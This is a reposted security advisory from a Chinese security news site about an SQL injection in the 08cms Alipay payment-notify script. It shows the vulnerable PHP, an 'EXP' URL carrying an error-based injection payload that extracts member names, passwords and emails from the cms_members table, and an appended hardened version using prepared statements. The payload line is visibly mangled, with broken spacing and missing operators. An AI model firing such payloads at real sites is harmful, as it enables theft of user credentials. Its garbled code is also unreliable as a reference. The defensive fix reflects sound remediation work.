08cms SQL injection vulnerability analysis and EXP - vulnerability warning - Black Bar Security Net

ID MYHACK58:62201340359
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-08-31T00:00:00

/*
 * Class name: alipay_notify
 * Function: payment process server notification class
 * Detailed: this page is the core processing file for the notify return; no need to modify
 * Version: 3.1
 * Modify date: 2010-10-29
 * Description:
 * The following code is only sample code provided for the convenience of merchant testing.
 * Merchants can write it themselves according to their website's needs and the technical
 * documentation; it is not required to use this code.
 * This code is only for learning and researching the Alipay interface and is provided as a reference.
 */
require_once("class/alipay_notify.php");
empty($_POST) && $_POST = &$_GET;
require_once('../pay_base.php');            // includes the pay_base class
$pay = new pay_base('alipay');              // instantiate
$pay->by = 'pays';                          // let's look inside at how this is written
$pay->order_sn = $_POST['out_trade_no'];    // look here: no filtering before it goes in
if(!$pay->getData()){                       // get data
    //log_result("order_failed");
    exit("fail");
}
........
function getData(){
    .........
    switch($this->by){
        case 'pays':
            $sql1 = "SELECT pid as order_id,mid,amount as totalfee FROM {$tblprefix}pays WHERE ordersn='$this->order_sn'";   // in here
            $this->status = 0;
            break;
    .......................................
    if($sql1 && $tmp = $db->fetch_one($sql1)){   // inject
        if(empty($key) || empty($tmp[$key]) || empty($sql2)){

EXP:

/include/paygate/alipay/pays. php? out_trade_no=2 2'%20AND%2 0(SELECT%2 0 1%20FROM(SELECT%20COUNT(),CONCAT((SELECT%20concat(0x3a,mname,0x3a,password,0x3a,email,0x3a)%20from%20cms_members%20limit%200,1),FLOOR(RAND(0)2))X%20FROM%20information_schema. tables%20GROUP%20BY%20X)a)%20AND'
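The root cause above is that out_trade_no is copied from the request straight into the SQL string, and the raw database error is returned to the caller. The following is an added example of a hardened lookup, written here for illustration; it is not 08cms code. It assumes a PDO connection, a table prefix value, and an order-number format of alphanumerics, underscore and dash (all assumptions; adjust the pattern to the real site's order numbers).

```php
<?php
// Added example, not part of 08cms. Hardened version of the 'pays' lookup:
// the order number is validated, bound as a parameter rather than spliced
// into SQL text, and database errors are never echoed back to the caller.
declare(strict_types=1);

/**
 * Reject any out_trade_no that does not look like a merchant order number.
 * Assumed format: 1-64 chars of [A-Za-z0-9_-]; adjust for the real site.
 */
function isValidOrderSn(string $orderSn): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_-]{1,64}$/', $orderSn);
}

/**
 * Look up the pays row with a prepared statement. The table prefix is a
 * configuration value, not user input, but it is still constrained since it
 * is interpolated into the SQL text. Returns the row, or null when not found
 * or when the input is rejected.
 */
function fetchPayOrder(PDO $db, string $tblprefix, string $orderSn): ?array
{
    if (!isValidOrderSn($orderSn)) {
        return null;
    }
    if (!preg_match('/^[a-z0-9_]{0,16}$/', $tblprefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $stmt = $db->prepare(
        "SELECT pid AS order_id, mid, amount AS totalfee "
        . "FROM {$tblprefix}pays WHERE ordersn = :ordersn"
    );
    $stmt->execute([':ordersn' => $orderSn]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage mirroring the notify handler flow. Connection details are placeholders.
// The Alipay notify class should also verify the callback signature before any
// database access happens; this example only covers the order lookup itself.
try {
    $db = new PDO(
        'mysql:host=127.0.0.1;dbname=cms;charset=utf8mb4', // placeholder DSN
        'dbuser',                                           // placeholder
        'dbpass',                                           // placeholder
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares
        ]
    );
    $orderSn = (string) ($_POST['out_trade_no'] ?? '');
    $row = fetchPayOrder($db, 'cms_', $orderSn);
    if ($row === null) {
        exit('fail');
    }
    // ... continue with amount/status checks against $row ...
} catch (Throwable $e) {
    // Log server-side; never return the database error text to the client,
    // since error-based injection depends on that text being visible.
    error_log('alipay notify lookup failed: ' . $e->getMessage());
    exit('fail');
}
```

The two changes that matter are binding ordersn as a parameter (so the value cannot change the query's structure) and returning only a generic "fail" on any exception (so the response carries no database error detail). The format check is defence in depth: it does not replace the prepared statement, but it rejects obviously malformed order numbers before any query runs and gives a clean point to log them.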


Excerpted from: http://www.unhonker.com/bug/1387.html